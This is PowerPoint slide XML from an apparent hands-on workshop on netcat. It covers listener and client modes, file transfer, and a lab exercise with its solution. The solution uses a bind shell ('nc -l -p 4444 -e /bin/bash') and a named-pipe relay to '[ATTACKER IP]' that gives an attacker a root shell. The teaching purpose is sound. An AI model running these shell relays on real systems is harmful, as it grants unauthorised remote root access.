              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SETUP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using Kali and Metasploitable as the OS (or 3 windows in Kali)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Kali image is represent the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Metasploitable image is the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No Actual FW for sake of simplicity – but remember it would block inbound connections that did not have an ACK set (initiated from the server)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On Kali open two terminals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As root : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –l –p 4444 –e /bin/bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(rename shell to “ROOT SERVER”)</a:t>
            </a:r>
            <a:endParaRPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other terminal should be as a non-root user (add one) (rename to “NORMAL SERVER”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>E.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>useradd bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On Metasploitable open a local terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>What commands can you run on the attacker, and the non-root shell in order to get root privileges for the attacker?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 10" descr="http://eswt.net/wp-content/uploads/2011/06/hands-on_workshop.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077200" y="0"/>
            <a:ext cx="1066800" cy="663787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37093971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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" sz="2400" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>SOLUTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Use a client to client relay!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>On Attacker (Metasploitable): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –l –p 2222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>On Non-root:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cd /tmp/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mknod backpipe p</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="ga-IE" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc [ATTACKER IP] 2222 0&lt;backpipe | nc 127.0.0.1 4444 1&gt;backpipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> on attacker machine – root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="ga-IE" sz="2600" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 10" descr="http://eswt.net/wp-content/uploads/2011/06/hands-on_workshop.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077200" y="0"/>
            <a:ext cx="1066800" cy="663787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1431014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5" descr="http://farm4.static.flickr.com/3273/3006780451_86a22b8ae9_z.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9209088" cy="6858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447800" y="1066800"/>
            <a:ext cx="6350000" cy="4686300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177036740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1361607147"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="1219200"/>
          <a:ext cx="39624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3702797858"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6248400" y="2895600"/>
          <a:ext cx="2590800" cy="1524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6" name="Curved Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="609600"/>
            <a:ext cx="2667000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -198"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="762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9" name="Curved Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3581400" y="4191000"/>
            <a:ext cx="2819400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 697"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="762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609471" y="0"/>
            <a:ext cx="4328679" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t> Client Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Arrow 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3352800"/>
            <a:ext cx="1676400" cy="457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88798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694906331"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="1219200"/>
          <a:ext cx="39624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1226010377"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6248400" y="2895600"/>
          <a:ext cx="2590800" cy="1524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6" name="Curved Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="609600"/>
            <a:ext cx="2667000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -198"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="762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9" name="Curved Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3581400" y="4191000"/>
            <a:ext cx="2819400" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 697"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="762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609471" y="0"/>
            <a:ext cx="4793299" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t> Listener Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Right Arrow 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4572000" y="3352800"/>
            <a:ext cx="1676400" cy="457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4890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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>c [options] [hostname] [remote port(s)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>-l: listener mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>-L: persistant listener (Windows only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>-u: UDP mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>-p: local port (listener = port to listen on / client = source port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>-v: verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>-wN: wait N seconds (useful for scanning)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" b="1" dirty="0" smtClean="0"/>
              <a:t>-z: Zero I/O mode (useful for scanning)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>-e: program to execute on connect</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10301410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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat chat server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>c –lp PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listen on a port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc TARGET_IP PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>		Connect to a port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –nlvp PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listen, output 						connection attempt,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>					don’t resolve IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –ulp PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listen on UDP Port</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5000215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334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Push a File (Client -&gt; Listener)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>c –nlvp PORT &gt; file_out</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc TARGET_IP PORT &lt; file_in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Netcat Pull </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0"/>
              <a:t>a File (Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>&lt;- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" u="sng" dirty="0"/>
              <a:t>Listener)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc –nlvp PORT &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> file_in</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc TARGET_IP PORT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt; file_out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>IP PORT &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/share/windows-binaries/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>wget.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7534417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334000"/>
          </a:xfrm>
        </p:spPr>
